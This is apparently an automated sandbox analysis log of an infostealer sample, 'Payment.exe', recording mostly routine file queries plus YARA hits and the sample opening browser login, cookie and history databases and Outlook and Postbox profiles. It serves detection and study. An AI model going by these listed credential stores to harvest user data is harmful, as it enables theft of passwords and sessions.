                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTE8B6.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTE8D6.tmp VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Users\user\AppData\Roaming\jwBqGZseW.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,8_2_02E68550
                  Source: C:\Users\user\Desktop\Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\Payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
